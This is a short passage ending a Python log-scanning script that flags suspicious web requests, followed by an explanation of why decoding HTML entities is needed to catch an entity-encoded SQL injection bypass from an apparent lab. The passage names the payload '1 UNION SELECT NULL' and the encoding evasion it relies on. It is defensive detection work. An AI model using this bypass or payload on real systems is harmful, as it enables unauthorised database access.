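    flagged = scan_log(SAMPLE_LOG)
    for h in flagged:
        print(h["client"], h["status"], h["rules"], h["path"])
    print(per_client(flagged))
```

Without the `unescape` step the entity-encoded stock check (the Lab 18 bypass) matches nothing, which is exactly the gap the lab exploits; with it, the decoded body reads `1 UNION SELECT NULL` and fires the same rule as the plain-text request.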
